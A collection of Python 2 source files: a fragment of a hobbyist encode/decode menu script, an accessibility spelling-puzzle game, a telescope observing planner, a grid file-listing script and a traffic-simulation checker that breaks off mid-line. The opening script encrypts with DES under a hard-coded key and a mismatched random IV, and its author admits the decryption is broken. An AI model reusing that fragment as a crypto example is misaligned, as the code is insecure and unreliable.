menu_telo="decrypt" if menu_telo == menu: print print "----> base16" print "----> base32" print "----> base64" print "----> cryptoDES" print oke=raw_input('[*] type and choice one $ ') menu_telo="cryptoDES" if menu_telo == oke: try: telo=raw_input('[*] file.encrypt : ') iv=Random.get_random_bytes(8) des1=DES.new('01234567', DES.MODE_CFB, iv) des2=DES.new('01234567', DES.MODE_CFB, iv) nama_file=open('%s' % (telo),'r') ss=nama_file.read() decs=des2.decrypt(ss) save1=open('text.decrypt','w') save1.writelines(decs) save1.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] decrypted at",now print "\n[*] saved file text.decrypt" except IOError: print "\n[*] Not found file encrypt",telo menu_telo="base16" if oke == menu_telo: raw1=raw_input('[*] text base16 $ ') dec16=base64.b16decode('%s' % (raw1)) for i in(5,4,3,2,1): print "[*] decoded at",now print "\n[*] result :",dec16 menu_telo="base32" if oke == menu_telo: ss=raw_input('[*] text or file $ ') menu_gg="text" if menu_gg == ss: raw2=raw_input('[*] text base32 $ ') print dec32=base64.b32decode('%s' % (raw2)) for i in(5,4,3,2,1): print "[*] decoded at",now print "\n[*] result :",dec32 menu_hh="file" if menu_hh == ss: try: fileno=raw_input('[*] file text.enc $ ') print fuck=open('%s' % (fileno), 'r') anjir=fuck.read() dec43=base64.b32decode(anjir) telo=open('text.dec','w') telo.writelines(dec43) telo.close() time.sleep(2) for i in(5,4,3,2,1): print "[*] decoded at",now print "\n[*] save file text.dec" os.remove(fileno) except: print "[*] Not found file enc " menu_telo="base64" #this is Bug Sorry if oke == menu_telo:# raw3=raw_input('[*] text base64 $ ')# dec64=base64.b64decode('%s' % (raw3))# for i in (5,4,3,2,1):# print "[*] decoded at",now# print "\n[*] result :",dec64# menu_telo="exit" if menu_telo == oke: print "[*] thanks for shopping" sys.exit() menu_item="exit" if menu == menu_item: print "[*] thanks for shopping" sys.exit() except KeyboardInterrupt: print "\n[*] ctrl+c active " sys.exit() ##### Finished #################################### Finished ################## ############################################################################### #the Bug is cannot decrypt crypto encryption but i will try to repair and make# #progam is the best ever #you can wait this progam to be version 2.0 #
bjura/EPlatform
spellerPuzzle.py
#!/bin/env python2.7 # -*- coding: utf-8 -*- # This file is part of AT-Platform. # # EPlatform is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # EPlatform is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with EPlatform. If not, see <http://www.gnu.org/licenses/>. import wxversion wxversion.select( '2.8' ) import glob, os, time import wx, alsaaudio import wx.lib.buttons as bt from pymouse import PyMouse from string import maketrans from pygame import mixer import subprocess as sp import shlex import numpy as np from random import shuffle #============================================================================= class speller( wx.Frame ): def __init__(self, parent): self.parent = parent self.initializeParameters( ) self.initializeBitmaps( ) self.createGui( ) #------------------------------------------------------------------------- def initializeParameters(self): self.pathToEPlatform = './' with open( self.pathToEPlatform + 'spellerParameters', 'r' ) as parametersFile: for line in parametersFile: if line[ :line.find('=')-1 ] == 'polishLettersColour': self.polishLettersColour = line[ line.rfind('=')+2:-1 ] elif line[ :line.find('=')-1 ] == 'voice': pass elif line[ :line.find('=')-1 ] == 'vowelColour': self.vowelColour= line[ line.rfind('=')+2:-1 ] elif not line.isspace( ): print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line self.vowelColour = 'red' self.polishLettersColour = 'blue' with open( self.pathToEPlatform + 'parametersCW', 'r' ) as parametersFile: for line in parametersFile: if line[ :line.find('=')-1 ] == 'textSize': pass elif line[ :line.find('=')-1 ] == 'checkTime': pass elif line[ :line.find('=')-1 ] == 'maxPoints': pass elif line[ :line.find('=')-1 ] == 'colorGrat': pass elif line[ :line.find('=')-1 ] == 'colorNiest': pass elif line[ :line.find('=')-1 ] == 'ileLuk': pass #self.ileLuk= int(line[ line.rfind('=')+2:-1 ]) elif not line.isspace( ): print 'Niewłaściwie opisane parametry' print 'Błąd w linii', line #self.ileLuk=2 with open( self.pathToEPlatform + 'parameters', 'r' ) as parametersFile: for line in parametersFile: if line[ :line.find('=')-1 ] == 'timeGap': self.timeGap = int( line[ line.rfind('=')+2:-1 ] ) elif line[ :line.find('=')-1 ] == 'backgroundColour': self.backgroundColour = line[ line.rfind('=')+2:-1 ] elif line[ :line.find('=')-1 ] == 'textColour': self.textColour = line[ line.rfind('=')+2:-1 ] elif line[ :line.find('=')-1 ] == 'scanningColour': self.scanningColour = line[ line.rfind('=')+2:-1 ] elif line[ :line.find('=')-1 ] == 'selectionColour': self.selectionColour = line[ line.rfind('=')+2:-1 ] elif line[ :line.find('=')-1 ] == 'musicVolume': pass elif line[ :line.find('=')-1 ] == 'filmVolume': pass elif not line.isspace( ): print '\nNiewłaściwie opisany parametr. Błąd w linii:\n%s' % line self.timeGap = 1500 self.backgroundColour = 'white' self.textColour = 'black' self.scanningColour = '#E7FAFD' self.selectionColour = '#9EE4EF' self.labels = [ 'a e b c d f g h i o j k l m n p u y r s t w z SPECIAL_CHARACTERS DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ), '1 2 3 4 5 6 7 8 9 0 + - * / = % $ & . , ; : " ? ! @ # ( ) [ ] { } < > ~ DELETE TRASH CHECK ORISPEAK SPEAK EXIT'.split( ) ] self.colouredLabels = [ 'a','e','i','o','u','y'] self.winWidth, self.winHeight = wx.DisplaySize( ) self.voice=False self.slowo=self.parent.word self.ileLiter =len(self.slowo) #if self.ileLuk >=len(self.slowo): #self.ileLuk=len(self.slowo)-1 self.numberOfRows = [4, 5 ] self.numberOfColumns = [ 8, 9 ] #self.flag = 'row' #self.rowIteration = 0 #self.columnIteration = 0 #self.countRows = 0 #self.countColumns = 0 self.kolejnyKrok=0 #self.maxNumberOfColumns = 2 self.numberOfPresses = 1 self.subSizerNumber = 0 self.mouseCursor = PyMouse( ) mixer.init( ) self.typewriterKeySound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_key.wav' ) self.typewriterForwardSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_forward.wav' ) self.typewriterSpaceSound = mixer.Sound( self.pathToEPlatform+'sounds/typewriter_space.wav' ) self.phones = glob.glob( self.pathToEPlatform+'sounds/phone/*' ) self.phoneLabels = [ item[ item.rfind( '/' )+1 : item.rfind( '_' ) ] for item in self.phones ] self.sounds = [ mixer.Sound( self.sound ) for self.sound in self.phones ] self.parent.SetBackgroundColour( 'dark grey' ) #------------------------------------------------------------------------- def initializeBitmaps(self): self.path=self.pathToEPlatform+'multimedia/' labelFiles = [ file for file in [ self.path+'icons/speller/special_characters.png', self.path+'icons/speller/DELETE.png', self.path+'icons/speller/TRASH.png', self.path+'icons/speller/CHECK.png',self.path+'icons/speller/ORISPEAK.png', self.path+'icons/speller/SPEAK.png', self.path+'icons/speller/exit.png', ] ] self.labelBitmaps = { } labelBitmapIndex = [ self.labels[ 0 ].index( self.labels[ 0 ][ -7 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -6 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -5 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -4 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -3 ] ),self.labels[ 0 ].index( self.labels[ 0 ][ -2 ] ), self.labels[ 0 ].index( self.labels[ 0 ][ -1 ] ) ] for labelFilesIndex, labelIndex in enumerate( labelBitmapIndex ): self.labelBitmaps[ self.labels[ 0 ][ labelIndex ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ labelFilesIndex ], 'rb' )) ) self.labelBitmaps2 = { } labelBitmapIndex2 = [ self.labels[ 1 ].index( self.labels[ 1 ][ -6 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -5 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -4 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -3 ] ),self.labels[ 1 ].index( self.labels[ 1 ][ -2 ] ), self.labels[ 1 ].index( self.labels[ 1 ][ -1 ] ) ] for labelFilesIndex2, labelIndex2 in enumerate( labelBitmapIndex2 ): self.labelBitmaps2[ self.labels[ 1 ][ labelIndex2 ] ] = wx.BitmapFromImage( wx.ImageFromStream( open( labelFiles[ 1: ][ labelFilesIndex2 ], 'rb' )) ) #------------------------------------------------------------------------- def createGui(self): self.textField = wx.TextCtrl( self.parent, style = wx.TE_LEFT|wx.TE_RICH2, size = ( self.winWidth, 0.2 * self.winHeight ) ) self.textField.SetFont( wx.Font( 60, wx.SWISS, wx.NORMAL, wx.NORMAL ) ) self.parent.mainSizer.Add( self.textField, flag = wx.EXPAND | wx.TOP | wx.BOTTOM, border = 3 ) self.subSizers = [ ] subSizer = wx.GridBagSizer( 3, 3 ) self.pomieszane=[] for i in self.slowo: self.pomieszane.append(self.labels[0].index(i)) shuffle(self.pomieszane) #print self.pomieszane for litera in self.pomieszane: if self.pomieszane.count(litera) > 1: self.pomieszane.remove(litera) zakres=(self.numberOfRows[0]-1)* self.numberOfColumns[0] -1 print zakres dodaj=np.random.randint(0,zakres,1)[0] while dodaj in self.pomieszane: dodaj=np.random.randint(0,zakres,1)[0] self.pomieszane.append(dodaj) slowoList=list(self.slowo) shuffle(slowoList) zmieszane_slowo= ''.join(slowoList) #print zmieszane_slowo for i in self.pomieszane: self.labels[0][i]=zmieszane_slowo[-1] zmieszane_slowo=zmieszane_slowo[:-1] self.pomieszane.sort() ile=0 for index_1, item in enumerate( self.labels[ 0 ][ :-7 ] ): ile+=1 b = bt.GenButton( self.parent, -1, item , name = item+str(ile), size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) ) b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) ) b.SetBezelWidth( 3 ) if index_1 not in self.pomieszane: b.SetBackgroundColour( 'grey' ) else: b.SetBackgroundColour( self.backgroundColour ) if item in self.colouredLabels and self.vowelColour != 'False': if index_1 not in self.pomieszane: b.SetForegroundColour( 'grey' ) else: b.SetForegroundColour( self.vowelColour ) else: if index_1 not in self.pomieszane: b.SetForegroundColour( 'grey' ) else: b.SetForegroundColour( self.textColour ) b.Bind( wx.EVT_LEFT_DOWN, self.onPress ) subSizer.Add( b, ( index_1 / self.numberOfColumns[ 0 ], index_1 % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND ) for index_2, item in enumerate( self.labels[ 0 ][ -7 : ] ): if item == 'SPECIAL_CHARACTERS': b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 0 ], 0.79 * self.winHeight / self.numberOfRows[ 0 ] ) ) b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) ) b.SetForegroundColour( 'grey' ) b.SetBackgroundColour( 'grey' ) else: b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps[ item ] ) b.SetBackgroundColour( self.backgroundColour ) b.SetBezelWidth( 3 ) b.Bind( wx.EVT_LEFT_DOWN, self.onPress ) if index_2==3: subSizer.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 0 ], ( index_1 + index_2+1 ) % self.numberOfColumns[ 0 ] ), (1,3), wx.EXPAND ) elif index_2>3: subSizer.Add( b, ( ( index_1 + index_2 +3) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +3) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND ) else: subSizer.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 0 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 0 ] ), wx.DefaultSpan, wx.EXPAND ) self.subSizers.append( subSizer ) self.parent.mainSizer.Add( self.subSizers[ 0 ], proportion = 1, flag = wx.EXPAND ) self.parent.SetSizer( self.parent.mainSizer ) subSizer2 = wx.GridBagSizer( 3, 3 ) for index_1, item in enumerate( self.labels[ 1 ][ :-6 ] ): b = bt.GenButton( self.parent, -1, item, name = item, size = ( 0.985*self.winWidth / self.numberOfColumns[ 1 ], 0.75 * self.winHeight / self.numberOfRows[ 1 ] ) ) b.SetFont( wx.Font( 100, wx.FONTFAMILY_ROMAN, wx.FONTWEIGHT_LIGHT, False ) ) b.SetBezelWidth( 3 ) b.SetBackgroundColour( self.backgroundColour ) b.SetForegroundColour( self.textColour ) b.Bind( wx.EVT_LEFT_DOWN, self.onPress ) subSizer2.Add( b, ( index_1 / self.numberOfColumns[ 1 ], index_1 % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND ) for index_2, item in enumerate( self.labels[ 1 ][ -6 : ] ): b = bt.GenBitmapButton( self.parent, -1, bitmap = self.labelBitmaps2[ item ] ) b.SetBackgroundColour( self.backgroundColour ) b.SetBezelWidth( 3 ) b.Bind( wx.EVT_LEFT_DOWN, self.onPress ) if index_2==2: subSizer2.Add( b, ( ( index_1 + index_2 +1) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), (1,4), wx.EXPAND ) elif index_2>2: subSizer2.Add( b, ( ( index_1 + index_2 +4) / self.numberOfColumns[ 1], ( index_1 + index_2+4 ) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND ) else: subSizer2.Add( b, ( ( index_1 + index_2+1 ) / self.numberOfColumns[ 1 ], ( index_1 + index_2 +1) % self.numberOfColumns[ 1 ] ), wx.DefaultSpan, wx.EXPAND ) self.subSizers.append( subSizer2 ) self.parent.mainSizer.Add( self.subSizers[ 1 ], proportion = 1, flag = wx.EXPAND ) self.parent.mainSizer.Show( item = self.subSizers[ 1 ], show = False, recursive = True ) self.parent.SetSizer( self.parent.mainSizer ) ikony=range(self.numberOfColumns[0]*self.numberOfRows[0]-8,self.numberOfColumns[0]*self.numberOfRows[0]-2) self.ktore=self.pomieszane for i in ikony: self.ktore.append(i) self.parent.Layout() self.usuniete=[] def onExit(self): self.parent.PicNr-=1 self.parent.stoper2.Stop( ) self.parent.back() def czytajLitere(self,litera): time.sleep(1) soundIndex = self.phoneLabels.index( [ item for item in self.phoneLabels if litera.swapcase() in item ][ 0 ] ) sound = self.sounds[ soundIndex ] sound.play( ) self.parent.SetFocus() #---------------------------------------------------------------------------- def onPress(self, event): self.numberOfPresses += 1 if self.numberOfPresses == 1: label = self.labels[ 0 ][self.ktore[self.kolejnyKrok-1]] item = self.subSizers[ 0 ].GetChildren() b = item[self.ktore[self.kolejnyKrok-1]] b=b.GetWindow( ) if label != 'SPEAK': b.SetBackgroundColour( self.selectionColour ) else: pass b.SetFocus( ) b.Update( ) if label in self.slowo: self.typewriterKeySound.play() self.textField.WriteText(label) item = self.subSizers[ 0 ].GetChildren() b = item[self.ktore[self.kolejnyKrok-1]] b=b.GetWindow( ) b.SetBackgroundColour( 'grey' ) b.SetForegroundColour('grey') b.SetFocus( ) b.Update( ) self.usuniete.append(self.ktore[self.kolejnyKrok-1]) self.ktore.remove( self.ktore[self.kolejnyKrok-1] ) self.kolejnyKrok=0 elif label == 'DELETE': text=self.textField.GetValue() if text: self.typewriterForwardSound.play( ) item = self.subSizers[ 0 ].GetChildren() b = item[self.usuniete[-1]] b=b.GetWindow( ) b.SetBackgroundColour( self.backgroundColour) if self.labels[0][self.usuniete[-1]] in self.colouredLabels: b.SetForegroundColour( self.vowelColour ) else: b.SetForegroundColour( self.textColour ) b.SetFocus( ) b.Update( ) self.ktore.append(self.usuniete[-1]) self.ktore.sort() self.usuniete.remove( self.usuniete[-1] ) self.textField.Remove(self.textField.GetInsertionPoint()-1, self.textField.GetInsertionPoint()) self.kolejnyKrok=0 else: pass elif label == 'SPEAK': if not self.voice: self.voice=True b.SetBackgroundColour('indian red') b.SetFocus( ) b.Update() else: b.SetBackgroundColour(self.backgroundColour) b.SetFocus( ) b.Update() self.voice=False elif label == 'ORISPEAK': self.parent.stoper2.Stop() if str(self.parent.word)+'.ogg' not in os.listdir(self.pathToEPlatform+'multimedia/spelling/'): command='sox -m '+self.pathToEPlatform+'sounds/phone/'+list(self.parent.word)[0].swapcase()+'.wav' ile=0 for l in list(self.parent.word)[1:]: ile+=2 command+=' "|sox '+self.pathToEPlatform+'sounds/phone/'+l.swapcase()+'.wav'+' -p pad '+str(ile)+'"' command+=' '+self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg' wykonaj=sp.Popen(shlex.split(command)) time.sleep(1.5) do_literowania=mixer.Sound(self.pathToEPlatform+'multimedia/spelling/'+self.parent.word+'.ogg') do_literowania.play() self.parent.stoper4.Start((do_literowania.get_length()+0.5 )* 1000) elif label == 'TRASH': text=self.textField.GetValue() if text: self.typewriterForwardSound.play() self.textField.Remove(0,self.textField.GetInsertionPoint()) for litera in self.usuniete: item = self.subSizers[ 0 ].GetChildren() b = item[litera] b=b.GetWindow( ) b.SetBackgroundColour( self.backgroundColour) if self.labels[0][litera] in self.colouredLabels: b.SetForegroundColour( self.vowelColour ) else: b.SetForegroundColour( self.textColour ) #print self.usuniete,self.ktore b.SetFocus( ) b.Update( ) while self.usuniete: self.ktore.append(self.usuniete[-1]) self.ktore.sort() self.usuniete.remove(self.usuniete[-1] ) self.kolejnyKrok=0 else: pass elif label == 'EXIT': self.onExit( ) elif label =='CHECK': self.parent.stoper2.Stop() self.parent.ownWord=self.textField.GetValue() self.parent.check() else: pass else: event.Skip( ) #------------------------------------------------------------------------- def timerUpdate(self, event): self.mouseCursor.move( self.winWidth - 12, self.winHeight - 20 ) self.numberOfPresses = 0 for i in self.ktore: if self.voice and i == self.numberOfRows[0]*self.numberOfColumns[0]-4: items = self.subSizers[ 0 ].GetChildren() b = items[i] b=b.GetWindow( ) b.SetBackgroundColour( 'indian red') b.SetFocus( ) b.Update( ) else: items = self.subSizers[ 0 ].GetChildren() b = items[i] b=b.GetWindow( ) b.SetBackgroundColour( self.backgroundColour ) b.SetFocus( ) b.Update( ) if self.voice and self.ktore[self.kolejnyKrok] == self.numberOfRows[0]*self.numberOfColumns[0]-4: item = self.subSizers[ 0 ].GetChildren() b = item[self.ktore[self.kolejnyKrok]] b=b.GetWindow( ) b.SetBackgroundColour( 'orange red') b.SetFocus( ) b.Update( ) else: item = self.subSizers[ 0 ].GetChildren() b = item[self.ktore[self.kolejnyKrok]] b=b.GetWindow( ) b.SetBackgroundColour( self.scanningColour) b.SetFocus( ) b.Update( ) if self.voice and self.labels[0][self.ktore[self.kolejnyKrok]] in self.slowo: self.parent.stoper2.Stop() label = self.labels[ 0 ][self.ktore[self.kolejnyKrok]] self.czytajLitere(label) self.parent.stoper2.Start(self.timeGap) if self.kolejnyKrok == len(self.ktore)-1: self.kolejnyKrok=0 else: self.kolejnyKrok+=1
CFIS-Octarine/octarine
planning/ph2.py
import json import argparse import numpy import sys import copy from astropy.coordinates import SkyCoord from astropy import units import operator class Program(object): def __init__(self, runid="16BP06", pi_login="gladman"): self.config = {"runid": runid, "pi_login": pi_login, "program_configuration": {"mjdates": [], "observing_blocks": [], "observing_groups": [] }} def add_target(self, target): self.config["program_configuration"]["mjdates"].append(target) def add_observing_block(self, observing_block): self.config["program_configuration"]["observing_blocks"].append(observing_block) def add_observing_group(self, observing_group): self.config["program_configuration"]["observing_groups"].append(observing_group) class Target(object): def __init__(self, filename=None): self.config = json.load(open(filename)) @property def token(self): return self.config["identifier"]["client_token"] @property def mag(self): return self.config["moving_target"]["ephemeris_points"][0]["mag"] @property def coordinate(self): return SkyCoord(self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["ra"], self.config["moving_target"]["ephemeris_points"][0]["coordinate"]["dec"], unit='degree') class ObservingBlock(object): def __init__(self, client_token, target_token): self.config = {"identifier": {"client_token": client_token}, "target_identifier": {"client_token": target_token}, "constraint_identifiers": [{"server_token": "C1"}], "instrument_config_identifiers": [{"server_token": "I1"}]} @property def token(self): return self.config["identifier"]["client_token"] class ObservingGroup(object): def __init__(self, client_token): self.config = {"identifier": {"client_token": client_token}, "observing_block_identifiers": []} def add_ob(self, client_token): self.config["observing_block_identifiers"].append({"client_token": client_token}) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument('ogname') parser.add_argument('mjdates', nargs='+') args = parser.parse_args() # Break the mjdates into OBs based on their max mag of source in pointing. cuts = numpy.array([23.0, 23.5, 24.0, 24.5, 25.0, 25.5, 26.0, 30.0]) IC_exptimes = [50, 100, 200, 300, 400, 500, 600, 700] program = Program() ob_tokens = [] mags = {} ob_coordinate = {} for filename in args.mjdates: target = Target(filename) program.add_target(target.config) ob_token = "OB-{}-{}".format(target.token, target.mag) ob = ObservingBlock(ob_token, target.token) idx = (target.mag > cuts).sum() + 4 ob.config["instrument_config_identifiers"] = [{"server_token": "I{}".format(idx)}] program.add_observing_block(ob.config) ob_tokens.append(ob_token) mags[ob_token] = target.mag ob_coordinate[ob_token] = target.coordinate sf = lambda x, y: cmp(x.ra, y.ra) order_tokens = sorted(ob_coordinate, cmp=sf, key=ob_coordinate.get) total_itime = 0 ogs = {} scheduled = {} og_idx = 0 while len(scheduled) < len(ob_tokens): og_idx += 1 og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, 0) sys.stdout.write("{}: ".format(og_token)) og = ObservingGroup(og_token) og_coord = None og_itime = 0 for ob_token in order_tokens: if ob_token not in scheduled: if og_coord is None: og_coord = ob_coordinate[ob_token] if ob_coordinate[ob_token].separation(og_coord) > 30 * units.degree: continue og.add_ob(ob_token) scheduled[ob_token] = True sys.stdout.write("{} ".format(ob_token)) sys.stdout.flush() idx = (mags[ob_token] > cuts).sum() print ob_token, mags[ob_token], idx + 4 og_itime += IC_exptimes[idx] + 40 if og_itime > 3000.0: break break total_itime += og_itime sys.stdout.write(" {}s \n".format(og_itime)) program.add_observing_group(og.config) nrepeats = 0 for repeat in range(nrepeats): total_itime += og_itime og_token = "OG_{}_{}_{}".format(args.ogname, og_idx, repeat + 1) og = copy.deepcopy(og) og.config["identifier"]["client_token"] = og_token program.add_observing_group(og.config) print "Total I-Time: {} hrs".format(total_itime/3600.) json.dump(program.config, open('program.json', 'w'), indent=4, sort_keys=True)
vmendez/DIRAC
DataManagementSystem/scripts/dirac-dms-user-lfns.py
#!/usr/bin/env python ######################################################################## # $HeadURL$ ######################################################################## """ Get the list of all the user files. """ __RCSID__ = "$Id$" from DIRAC.Core.Base import Script days = 0 months = 0 years = 0 wildcard = None baseDir = '' emptyDirsFlag = False Script.registerSwitch( "D:", "Days=", "Match files older than number of days [%s]" % days ) Script.registerSwitch( "M:", "Months=", "Match files older than number of months [%s]" % months ) Script.registerSwitch( "Y:", "Years=", "Match files older than number of years [%s]" % years ) Script.registerSwitch( "w:", "Wildcard=", "Wildcard for matching filenames [All]" ) Script.registerSwitch( "b:", "BaseDir=", "Base directory to begin search (default /[vo]/user/[initial]/[username])" ) Script.registerSwitch( "e", "EmptyDirs", "Create a list of empty directories" ) Script.setUsageMessage( '\n'.join( [ __doc__.split( '\n' )[1], 'Usage:', ' %s [option|cfgfile] ...' % Script.scriptName, ] ) ) Script.parseCommandLine( ignoreErrors = False ) for switch in Script.getUnprocessedSwitches(): if switch[0] == "D" or switch[0].lower() == "days": days = int( switch[1] ) if switch[0] == "M" or switch[0].lower() == "months": months = int( switch[1] ) if switch[0] == "Y" or switch[0].lower() == "years": years = int( switch[1] ) if switch[0].lower() == "w" or switch[0].lower() == "wildcard": wildcard = switch[1] if switch[0].lower() == "b" or switch[0].lower() == "basedir": baseDir = switch[1] if switch[0].lower() == "e" or switch[0].lower() == "emptydirs": emptyDirsFlag = True import DIRAC from DIRAC import gLogger from DIRAC.ConfigurationSystem.Client.Helpers.Registry import getVOForGroup from DIRAC.Core.Security.ProxyInfo import getProxyInfo from DIRAC.Resources.Catalog.FileCatalog import FileCatalog from DIRAC.Core.Utilities.List import sortList from datetime import datetime, timedelta import sys, os, time, fnmatch fc = FileCatalog() def isOlderThan( cTimeStruct, days ): timeDelta = timedelta( days = days ) maxCTime = datetime.utcnow() - timeDelta if cTimeStruct < maxCTime: return True return False withMetadata = False if days or months or years: withMetadata = True totalDays = 0 if years: totalDays += 365 * years if months: totalDays += 30 * months if days: totalDays += days res = getProxyInfo( False, False ) if not res['OK']: gLogger.error( "Failed to get client proxy information.", res['Message'] ) DIRAC.exit( 2 ) proxyInfo = res['Value'] username = proxyInfo['username'] vo = '' if 'group' in proxyInfo: vo = getVOForGroup( proxyInfo['group'] ) if not baseDir: if not vo: gLogger.error( 'Could not determine VO' ) Script.showHelp() baseDir = '/%s/user/%s/%s' % ( vo, username[0], username ) baseDir = baseDir.rstrip( '/' ) gLogger.info( 'Will search for files in %s' % baseDir ) activeDirs = [baseDir] allFiles = [] emptyDirs = [] while len( activeDirs ) > 0: currentDir = activeDirs.pop() res = fc.listDirectory( currentDir, withMetadata, timeout = 360 ) if not res['OK']: gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Message'] ) ) elif currentDir in res['Value']['Failed']: gLogger.error( "Error retrieving directory contents", "%s %s" % ( currentDir, res['Value']['Failed'][currentDir] ) ) else: dirContents = res['Value']['Successful'][currentDir] subdirs = dirContents['SubDirs'] files = dirContents['Files'] if not subdirs and not files: emptyDirs.append( currentDir ) gLogger.notice( '%s: empty directory' % currentDir ) else: for subdir in sorted( subdirs, reverse = True ): if ( not withMetadata ) or isOlderThan( subdirs[subdir]['CreationDate'], totalDays ): activeDirs.append( subdir ) for filename in sorted( files ): fileOK = False if ( not withMetadata ) or isOlderThan( files[filename]['MetaData']['CreationDate'], totalDays ): if wildcard is None or fnmatch.fnmatch( filename, wildcard ): fileOK = True if not fileOK: files.pop( filename ) allFiles += sorted( files ) gLogger.notice( "%s: %d files%s, %d sub-directories" % ( currentDir, len( files ), ' matching' if withMetadata or wildcard else '', len( subdirs ) ) ) outputFileName = '%s.lfns' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' ) outputFile = open( outputFileName, 'w' ) for lfn in sortList( allFiles ): outputFile.write( lfn + '\n' ) outputFile.close() gLogger.notice( '%d matched files have been put in %s' % ( len( allFiles ), outputFileName ) ) if emptyDirsFlag: outputFileName = '%s.emptydirs' % baseDir.replace( '/%s' % vo, '%s' % vo ).replace( '/', '-' ) outputFile = open( outputFileName, 'w' ) for dir in sortList( emptyDirs ): outputFile.write( dir + '\n' ) outputFile.close() gLogger.notice( '%d empty directories have been put in %s' % ( len( emptyDirs ), outputFileName ) ) DIRAC.exit( 0 )
rudhir-upretee/Sumo17_With_Netsim
tools/assign/costFunctionChecker.py
#!/usr/bin/env python """ @file costFunctionChecker.py @author Michael Behrisch @author Daniel Krajzewicz @author Jakob Erdmann @date 2009-08-31 @version $Id: costFunctionChecker.py 13811 2013-05-01 20:31:43Z behrisch $ Run duarouter repeatedly and simulate weight changes via a cost function. SUMO, Simulation of Urban MObility; see http://sumo.sourceforge.net/ Copyright (C) 2009-2013 DLR (http://www.dlr.de/) and contributors All rights reserved """ import os, sys, subprocess, types from datetime import datetime from optparse import OptionParser from xml.sax import make_parser, handler def call(command, log): if not isinstance(args, types.StringTypes): command = [str(c) for c in command] print >> log, "-" * 79 print >> log, command log.flush() retCode = subprocess.call(command, stdout=log, stderr=log) if retCode != 0: print >> sys.stderr, "Execution of %s failed. Look into %s for details." % (command, log.name) sys.exit(retCode) def writeRouteConf(step, options, file, output): fd = open("iteration_" + str(step) + ".duarcfg", "w") print >> fd, """<configuration> <input> <net-file value="%s"/>""" % options.net if step==0: if options.flows: print >> fd, ' <flow-definition value="%s"/>' % file else: print >> fd, ' <trip-defs value="%s"/>' % file else: print >> fd, ' <alternatives value="%s"/>' % file print >> fd, ' <weights value="dump_%s_%s.xml"/>' % (step-1, options.aggregation) print >> fd, """ </input> <output> <output-file value="%s"/> <exit-times value="True"/> </output>""" % output print >> fd, """ <processing> <continue-on-unbuild value="%s"/> <expand-weights value="True"/> <gBeta value="%s"/> <gA value="%s"/> </processing>""" % (options.continueOnUnbuild, options.gBeta, options.gA) print >> fd, ' <random_number><abs-rand value="%s"/></random_number>' % options.absrand print >> fd, ' <time><begin value="%s"/>' % options.begin, if options.end: print >> fd, '<end value="%s"/>' % options.end, print >> fd, """</time> <report> <verbose value="%s"/> <suppress-warnings value="%s"/> </report> </configuration>""" % (options.verbose, options.noWarnings) fd.close() class RouteReader(handler.ContentHandler): def __init__(self): self._edgeWeights = {} self._maxDepart = 0 def startElement(self, name, attrs): if name == 'route': for edge in attrs['edges'].split(): if not edge in self._edgeWeights: self._edgeWeights[edge] = 0 self._edgeWeights[edge] += 1 elif name == 'vehicle': if float(attrs['depart']) > self._maxDepart: self._maxDepart = float(attrs['depart']) def getWeight(self, edge): return self._edgeWeights.get(edge, 0) def getMaxDepart(self): return self._maxDepart class NetReader(handler.ContentHandler): def __init__(self): self._edges = [] def startElement(self, name, attrs): if name == 'edge': if not attrs.has_key('function') or attrs['function'] == 'normal': self._edges.append(attrs['id']) def getEdges(self): return self._edges def identity(edge, weight): return weight def generateWeights(step, options, edges, weights, costFunction): fd = open("dump_%s_%s.xml" % (step, options.aggregation), "w") print >> fd, '<?xml version="1.0"?>\n<netstats>' for time in range(0, int(reader.getMaxDepart()+1), options.aggregation): print >> fd, ' <interval begin="%s" end="%s" id="dump_%s">' % (time, time + options.aggregation, options.aggregation) for edge in edges: cost = costFunction(edge, weights.getWeight(edge)) if cost != None: print >> fd, ' <edge id="%s" traveltime="%s"/>' % (edge, cost) print >> fd, ' </interval>' print >> fd, '</netstats>' fd.close() optParser = OptionParser() optParser.add_option("-v", "--verbose", action="store_true", dest="verbose", default=False, help="tell me what you are 